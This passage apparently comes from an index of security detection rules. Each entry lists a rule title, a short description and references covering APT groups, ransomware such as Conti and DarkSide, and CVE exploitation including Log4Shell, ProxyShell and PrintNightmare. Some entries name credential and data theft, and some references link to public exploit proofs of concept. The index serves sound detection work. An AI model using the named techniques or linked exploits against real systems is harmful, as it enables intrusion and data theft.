https://blog.yoroi.company/research/ursnif-long-live-the-steganography/, https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/ |
Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32 |
Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local |
https://pbs.twimg.com/media/EF3yLGoWkAEGeLa?format=jpg |
APT31 Judgement Panda Activity |
Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report |
https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html |
APT40 Dropbox Tool User Agent |
Detects suspicious user agent string of APT40 Dropbox tool |
Internal research from Florian Roth |
Potential Russian APT Credential Theft Activity |
Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike |
https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html |
Potential EmpireMonkey Activity |
Detects potential EmpireMonkey APT activity |
https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/, https://malpedia.caad.fkie.fraunhofer.de/actor/anthropoid_spider |
Equation Group DLL_U Export Function Load |
Detects a specific export function name used by one of EquationGroup tools |
https://github.com/00derp/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=, https://twitter.com/cyb3rops/status/972186477512839170 |
Mustang Panda Dropper |
Detects specific process parameters as used by Mustang Panda droppers |
https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/, https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/, https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations |
Operation Wocao Activity |
Detects activity mentioned in Operation Wocao report |
https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/, https://twitter.com/SBousseaden/status/1207671369963646976 |
Operation Wocao Activity - Security |
Detects activity mentioned in Operation Wocao report |
https://web.archive.org/web/20200226212615/https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/, https://web.archive.org/web/20200226212615/https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdf, https://twitter.com/SBousseaden/status/1207671369963646976 |
CVE-2020-0688 Exploitation Attempt |
Detects CVE-2020-0688 Exploitation attempts |
https://github.com/Ridter/cve-2020-0688 |
CVE-2020-0688 Exchange Exploitation via Web Log |
Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688 |
https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/ |
CVE-2020-0688 Exploitation via Eventlog |
Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688 |
https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/, https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/ |
CVE-2020-10148 SolarWinds Orion API Auth Bypass |
Detects CVE-2020-10148 SolarWinds Orion API authentication bypass attempts |
https://kb.cert.org/vuls/id/843464 |
DNS RCE CVE-2020-1350 |
Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process |
https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/, https://web.archive.org/web/20230329172447/https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html |
Potential Emotet Rundll32 Execution |
Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL |
https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html, https://cyber.wtf/2021/11/15/guess-whos-back/ |
CVE-2020-5902 F5 BIG-IP Exploitation Attempt |
Detects the exploitation attempt of the vulnerability found in F5 BIG-IP and described in CVE-2020-5902 |
https://support.f5.com/csp/article/K52145254, https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/, https://twitter.com/yorickkoster/status/1279709009151434754, https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/ |
Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195 |
Detects exploitation attempt against Citrix Netscaler, Application Delivery Controller (ADS) and Citrix Gateway exploiting vulnerabilities reported as CVE-2020-8193 and CVE-2020-8195 |
https://support.citrix.com/article/CTX276688, https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/, https://dmaasland.github.io/posts/citrix.html |
ComRAT Network Communication |
Detects Turla ComRAT network communication. |
https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf |
Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoC |
Detects the execution of the commonly used ZeroLogon PoC executable. |
https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/, https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ |
Suspicious PrinterPorts Creation (CVE-2020-1048) |
Detects new commands that add new printer port which point to suspicious file |
https://windows-internals.com/printdemon-cve-2020-1048/ |
Exploited CVE-2020-10189 Zoho ManageEngine |
Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189 |
https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html, https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224 |
CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry |
Detects changes to the "Ports" registry key with data that includes a Windows path or a file with a suspicious extension.
This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability.
|
https://windows-internals.com/printdemon-cve-2020-1048/ |
TerraMaster TOS CVE-2020-28188 |
Detects the exploitation of the TerraMaster TOS vulnerability described in CVE-2020-28188 |
https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/, https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/ |
Blue Mockingbird |
Attempts to detect system changes made by Blue Mockingbird |
https://redcanary.com/blog/blue-mockingbird-cryptominer/ |
GALLIUM IOCs |
Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report. |
https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/, https://github.com/Azure/Azure-Sentinel/blob/a02ce85c96f162de6f8cc06f07a53b6525f0ff7f/Solutions/Legacy%20IOC%20based%20Threat%20Protection/Analytic%20Rules/GalliumIOCs.yaml |
Potential Maze Ransomware Activity |
Detects specific process characteristics of Maze ransomware word document droppers |
https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html, https://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/, https://app.any.run/tasks/65a79440-373a-4725-8d74-77db9f2abda4/ |
Trickbot Malware Activity |
Detects Trickbot malware process tree pattern in which "rundll32.exe" is a parent of "wermgr.exe" |
https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20, https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/ |
Potential Ke3chang/TidePool Malware Activity |
Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020 |
https://web.archive.org/web/20200618080300/https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf, https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/ |
EvilNum APT Golden Chickens Deployment Via OCX Files |
Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report |
https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/, https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/ |
Cisco ASA FTD Exploit CVE-2020-3452 |
Detects exploitation attempts on Cisco ASA FTD systems exploiting CVE-2020-3452 with a status code of 200 (sccessful exploitation) |
https://twitter.com/aboul3la/status/1286012324722155525, https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter |
FlowCloud Registry Markers |
Detects FlowCloud malware registry markers from threat group TA410.
The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components.
|
https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new |
Oracle WebLogic Exploit CVE-2020-14882 |
Detects exploitation attempts on WebLogic servers |
https://isc.sans.edu/diary/26734, https://twitter.com/jas502n/status/1321416053050667009?s=20, https://twitter.com/sudo_sudoka/status/1323951871078223874 |
Lazarus Group Activity |
Detects different process execution behaviors as described in various threat reports on Lazarus group activity |
https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/, https://www.hvs-consulting.de/lazarus-report/ |
GALLIUM Artefacts - Builtin |
Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019. |
https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/, https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11) |
Leviathan Registry Key Activity |
Detects registry key used by Leviathan APT in Malaysian focused campaign |
https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign |
Solarwinds SUPERNOVA Webshell Access |
Detects access to SUPERNOVA webshell as described in Guidepoint report |
https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/, https://www.anquanke.com/post/id/226029 |
UNC2452 Process Creation Patterns |
Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries |
https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/ |
Greenbug Espionage Group Indicators |
Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec |
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia |
UNC2452 PowerShell Pattern |
Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports |
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware, https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command |
Suspicious VBScript UN2452 Pattern |
Detects suspicious inline VBScript keywords as used by UNC2452 |
https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ |
TAIDOOR RAT DLL Load |
Detects specific process characteristics of Chinese TAIDOOR RAT malware load |
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a |
Winnti Malware HK University Campaign |
Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities |
https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/ |
Winnti Pipemon Characteristics |
Detects specific process characteristics of Winnti Pipemon malware reported by ESET |
https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/ |
CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum |
Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum |
https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/, https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/ |
CVE-2021-31979 CVE-2021-33771 Exploits |
Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum |
https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/, https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/ |
Arcadyan Router Exploitations |
Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091. |
https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2, https://www.tenable.com/security/research/tra-2021-13, https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild |
Possible Exploitation of Exchange RCE CVE-2021-42321 |
Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321 |
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42321 |
Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection |
Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 . |
https://twitter.com/mvelazco/status/1410291741241102338, https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675, https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 |
CVE-2021-1675 Print Spooler Exploitation Filename Pattern |
Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675 |
https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/, https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare, https://github.com/cube0x0/CVE-2021-1675 |
Possible CVE-2021-1675 Print Spooler Exploitation |
Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675 |
https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/, https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare, https://twitter.com/fuzzyf10w/status/1410202370835898371 |
CVE-2021-1675 Print Spooler Exploitation |
Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 |
https://twitter.com/MalwareJake/status/1410421967463731200 |
CVE-2021-1675 Print Spooler Exploitation IPC Access |
Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527 |
https://twitter.com/INIT_3/status/1410662463641731075 |
Oracle WebLogic Exploit CVE-2021-2109 |
Detects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109 |
https://twitter.com/pyn3rd/status/1351696768065409026, https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw |
CVE-2021-21972 VSphere Exploitation |
Detects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972 |
https://www.vmware.com/security/advisories/VMSA-2021-0002.html, https://f5.pm/go-59627.html, https://swarm.ptsecurity.com/unauth-rce-vmware |
CVE-2021-21978 Exploitation Attempt |
Detects the exploitation of the VMware View Planner vulnerability described in CVE-2021-21978 |
https://twitter.com/wugeej/status/1369476795255320580, https://paper.seebug.org/1495/ |
VMware vCenter Server File Upload CVE-2021-22005 |
Detects exploitation attempts using file upload vulnerability CVE-2021-22005 in the VMWare vCenter Server. |
https://kb.vmware.com/s/article/85717, https://www.tenable.com/blog/cve-2021-22005-critical-file-upload-vulnerability-in-vmware-vcenter-server |
Fortinet CVE-2021-22123 Exploitation |
Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs |
https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection |
Pulse Connect Secure RCE Attack CVE-2021-22893 |
This rule detects exploitation attempts using Pulse Connect Secure(PCS) vulnerability (CVE-2021-22893) |
https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html, https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784 |
Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt |
Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084 |
https://nvd.nist.gov/vuln/detail/CVE-2021-26084, https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html, https://github.com/h3v0x/CVE-2021-26084_Confluence |
Potential CVE-2021-26084 Exploitation Attempt |
Detects potential exploitation of CVE-2021-260841 a Confluence RCE using OGNL injection |
https://github.com/TesterCC/exp_poc_library/blob/master/exp_poc/CVE-2021-26084_Confluence_OGNL_injection/CVE-2021-26084.md, https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md, https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html, https://mraddon.blog/2017/03/20/confluence-trick-to-create-pages-from-blueprint-templates/ |
Exploitation of CVE-2021-26814 in Wazuh |
Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814 |
https://github.com/WickdDavid/CVE-2021-26814/blob/6a17355a10ec4db771d0f112cbe031e418d829d5/PoC.py |
Potential CVE-2021-26857 Exploitation Attempt |
Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service |
https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ |
CVE-2021-26858 Exchange Exploitation |
Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for
creation of non-standard files on disk by Exchange Server’s Unified Messaging service
which could indicate dropping web shells or other malicious content
|
https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ |
ProxyLogon Reset Virtual Directories Based On IIS Log |
When exploiting this vulnerability with CVE-2021-26858, an SSRF attack is used to manipulate virtual directories |
https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c |
Potential CVE-2021-27905 Exploitation Attempt |
Detects exploitation attempt of the CVE-2021-27905 which affects all Apache Solr versions prior to and including 8.8.1. |
https://twitter.com/Al1ex4/status/1382981479727128580, https://twitter.com/sec715/status/1373472323538362371, https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/, https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186, https://github.com/murataydemir/CVE-2021-27905 |
Exchange Exploitation CVE-2021-28480 |
Detects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480 |
https://twitter.com/GossiTheDog/status/1392965209132871683?s=20 |
CVE-2021-33766 Exchange ProxyToken Exploitation |
Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766 |
https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server |
Serv-U Exploitation CVE-2021-35211 by DEV-0322 |
Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322 |
https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ |
Suspicious Word Cab File Write CVE-2021-40444 |
Detects file creation patterns noticeable during the exploitation of CVE-2021-40444 |
https://twitter.com/RonnyTNL/status/1436334640617373699?s=20, https://twitter.com/vanitasnk/status/1437329511142420483?s=21 |
Potential CVE-2021-40444 Exploitation Attempt |
Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations |
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444, https://twitter.com/neonprimetime/status/1435584010202255375, https://www.joesandbox.com/analysis/476188/1/iochtml |
Potential Exploitation Attempt From Office Application |
Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE) |
https://twitter.com/sbousseaden/status/1531653369546301440, https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444, https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190 |
ADSelfService Exploitation |
Detects suspicious access to URLs that was noticed in cases in which attackers exploitated the ADSelfService vulnerability CVE-2021-40539 |
https://us-cert.cisa.gov/ncas/alerts/aa21-259a |
CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit |
Detects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539). |
https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/, https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html, https://us-cert.cisa.gov/ncas/alerts/aa21-259a |
InstallerFileTakeOver LPE CVE-2021-41379 File Create Event |
Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file |
https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver, https://www.zerodayinitiative.com/advisories/ZDI-21-1308/ |
Potential CVE-2021-41379 Exploitation Attempt |
Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" process as a child of Microsoft Edge elevation service "elevation_service" with "LOCAL_SYSTEM" rights |
https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver, https://www.bleepingcomputer.com/news/microsoft/new-windows-zero-day-with-public-exploit-lets-you-become-an-admin/, https://www.zerodayinitiative.com/advisories/ZDI-21-1308/, https://www.logpoint.com/en/blog/detecting-privilege-escalation-zero-day-cve-2021-41379/ |
LPE InstallerFileTakeOver PoC CVE-2021-41379 |
Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379 |
https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver |
CVE-2021-41773 Exploitation Attempt |
Detects exploitation of flaw in path normalization in Apache HTTP server 2.4.49.
An attacker could use a path traversal attack to map URLs to files outside the expected document root.
If files outside of the document root are not protected by "require all denied" these requests can succeed.
Additionally this flaw could leak the source of interpreted files like CGI scripts.
This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
|
https://nvd.nist.gov/vuln/detail/CVE-2021-41773, https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782, https://twitter.com/ptswarm/status/1445376079548624899, https://twitter.com/h4x0r_dz/status/1445401960371429381, https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/cves/2021/CVE-2021-41773.yaml, https://twitter.com/bl4sty/status/1445462677824761878 |
Sitecore Pre-Auth RCE CVE-2021-42237 |
Detects exploitation attempts of Sitecore Experience Platform Pre-Auth RCE CVE-2021-42237 found in Report.ashx |
https://blog.assetnote.io/2021/11/02/sitecore-rce/, https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776 |
Potential CVE-2021-42278 Exploitation Attempt |
The attacker creates a computer object using those permissions with a password known to her.
After that she clears the attribute ServicePrincipalName on the computer object.
Because she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.
|
https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/ |
Suspicious Computer Account Name Change CVE-2021-42287 |
Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287 |
https://medium.com/@mvelazco/hunting-for-samaccountname-spoofing-cve-2021-42287-and-domain-controller-impersonation-f704513c8a45 |
Grafana Path Traversal Exploitation CVE-2021-43798 |
Detects a successful Grafana path traversal exploitation |
https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/, https://github.com/search?q=CVE-2021-43798 |
CVE-2021-44077 POC Default Dropped File |
Detects the creation of "msiexec.exe" in the "bin" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section) |
https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/, https://github.com/horizon3ai/CVE-2021-44077/blob/b7a48e25824e8ead95e028475c7fd0e107e6e6bf/exploit.py |
Potential CVE-2021-44228 Exploitation Attempt - VMware Horizon |
Detects potential initial exploitation attempts against VMware Horizon deployments running a vulnerable versions of Log4j.
|
https://portswigger.net/daily-swig/vmware-horizon-under-attack-as-china-based-ransomware-group-targets-log4j-vulnerability, https://twitter.com/TheDFIRReport/status/1482078434327244805, https://www.pwndefend.com/2022/01/07/log4shell-exploitation-and-hunting-on-vmware-horizon-cve-2021-44228/ |
Log4j RCE CVE-2021-44228 Generic |
Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell) |
https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/, https://news.ycombinator.com/item?id=29504755, https://github.com/tangxiaofeng7/apache-log4j-poc, https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b, https://github.com/YfryTchsGD/Log4jAttackSurface, https://twitter.com/shutingrz/status/1469255861394866177?s=21 |
Log4j RCE CVE-2021-44228 in Fields |
Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell) |
https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/, https://news.ycombinator.com/item?id=29504755, https://github.com/tangxiaofeng7/apache-log4j-poc, https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b, https://github.com/YfryTchsGD/Log4jAttackSurface, https://twitter.com/shutingrz/status/1469255861394866177?s=21 |
Exchange ProxyShell Pattern |
Detects URL patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful) |
https://youtu.be/5mqid-7zp8k?t=2231, https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html, https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 |
Suspicious RazerInstaller Explorer Subprocess |
Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM |
https://twitter.com/j0nh4t/status/1429049506021138437, https://streamable.com/q2dsji |
Successful Exchange ProxyShell Attack |
Detects URP patterns and status codes that indicate a successful ProxyShell exploitation attack against Exchange servers |
https://youtu.be/5mqid-7zp8k?t=2231, https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html, https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 |
Potential SystemNightmare Exploitation Attempt |
Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM |
https://github.com/GossiTheDog/SystemNightmare |
SonicWall SSL/VPN Jarrewrite Exploitation |
Detects exploitation attempts of the SonicWall Jarrewrite Exploit |
https://web.archive.org/web/20210126045316/https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/, https://github.com/darrenmartyn/VisualDoor |
Potential BlackByte Ransomware Activity |
Detects command line patterns used by BlackByte ransomware in different operations |
https://redcanary.com/blog/blackbyte-ransomware/ |
Conti Volume Shadow Listing |
Detects a command used by conti to find volume shadow backups |
https://twitter.com/vxunderground/status/1423336151860002816?s=20, https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection |
Conti NTDS Exfiltration Command |
Detects a command used by conti to exfiltrate NTDS |
https://twitter.com/vxunderground/status/1423336151860002816?s=20, https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection |
Potential Conti Ransomware Activity |
Detects a specific command used by the Conti ransomware group |
https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/, https://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19 |
Potential Conti Ransomware Database Dumping Activity Via SQLCmd |
Detects a command used by conti to dump database |
https://twitter.com/vxunderground/status/1423336151860002816?s=20, https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection, https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15 |
DarkSide Ransomware Pattern |
Detects DarkSide Ransomware and helpers |
https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html, https://app.any.run/tasks/8b9a571b-bcc1-4783-ba32-df4ba623b9c0/, https://www.joesandbox.com/analysis/411752/0/html#7048BB9A06B8F2DD9D24C77F389D7B2B58D2 |
Potential Devil Bait Related Indicator |
Detects the creation of ".xml" and ".txt" files in folders of the "\AppData\Roaming\Microsoft" directory by uncommon processes. This behavior was seen common across different Devil Bait samples and stages as described by the NCSC |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf |
Potential Devil Bait Malware Reconnaissance |
Detects specific process behavior observed with Devil Bait samples |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf, https://www.virustotal.com/gui/file/fa71eee906a7849ba3f4bab74edb577bd1f1f8397ca428591b4a9872ce1f1e9b/behavior |
Devil Bait Potential C2 Communication Traffic |
Detects potential C2 communication related to Devil Bait malware |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf |
FoggyWeb Backdoor DLL Loading |
Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected "version.dll" dll |
https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/ |
Goofy Guineapig Backdoor IOC |
